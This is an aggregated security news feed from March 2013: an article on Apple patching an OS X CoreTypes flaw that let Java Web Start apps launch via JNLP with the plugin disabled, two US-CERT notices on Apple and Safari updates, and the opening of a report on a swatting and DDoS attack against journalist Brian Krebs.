Apple purges OS X flaw that let Java apps run when plugin was disabled

Apple has updated OS X to patch more than a dozen security flaws, including one that allowed attackers to exploit Web-based Java flaws even when end users had disabled the widely abused browser plugin.

The CoreTypes vulnerability in OS X Lion and Mountain Lion posed a threat because it undermined widely repeated advice for Mac users to disable Java in browser plugins. The measure is designed to repel a surge of attacks that exploit vulnerabilities in the Oracle-controlled software. Criminal hackers use them to surreptitiously install malware when computers visit booby-trapped websites. According to a bulletin accompanying Thursday's OS X update, attackers could override the protective measure by manipulating the Java Network Launching Protocol, or JNLP, which allows applications to launch directly from a browser.

"Visiting a maliciously crafted website could allow a Java Web Start application to be launched automatically even if the Java plug-in is disabled," the bulletin explained. "Java Web Start applications would run even if the Java plug-in was disabled. This issue was addressed by removing JNLP files from the CoreTypes safe file type list, so the Web Start application will not be run unless the user opens it in the Downloads directory."

Read 1 remaining paragraphs | Comments

Apple Releases OS X v10.8.3 and Security Update 2013-001

Original release date: March 15, 2013

Apple has released OS X v10.8.3 and Security Update 2013-001 to address multiple vulnerabilities. These vulnerabilities may allow an attacker to execute arbitrary code, bypass authentication, leverage additional attacks, cause a denial-of-service condition or obtain sensitive information.

US-CERT encourages users and administrators to review Apple Security article HT5672 and apply any necessary updates to help mitigate the risks.


This product is provided subject to this Notification and this Privacy & Use policy.


Apple Releases Security Updates for Safari on OS X

Original release date: March 15, 2013

Apple has released security updates for Safari Webkit 6.0.3 to address multiple vulnerabilities. These vulnerabilities could allow a remote attacker to execute arbitrary code or cause a cross-site scripting attack.

Safari 6.0.3 WebKit updates are available for the following versions:

  • OSX Lion v10.7.5
  • OSX Lion Server v10.7.5
  • OS X Mountain Lion v10.8.2

US-CERT encourages users and administrators to review Apple Support Article HT5671 and follow best-practice security policies to determine if their organization is affected and the appropriate response.


This product is provided subject to this Notification and this Privacy & Use policy.


Security reporter tells Ars about hacked 911 call that sent SWAT team to his house (Updated)

Update: Krebs has now written about his experience in some detail. The same people responsible for the DDoS attack carried out yesterday on Krebs' site launched a similar attack on Ars Technica this morning.

Original story:

Brian Krebs has always been a trailblazer among security reporters. His exposés completely shut down a California hosting service that coddled spammers and child pornographers and severely disrupted an organized crime syndicate known as Russian Business Network. More recently, his investigative journalism has followed the money to the people who sell malware exploit kits, illicitly procured credit reports, and denial-of-service services in underground forums.

Read 16 remaining paragraphs | Comments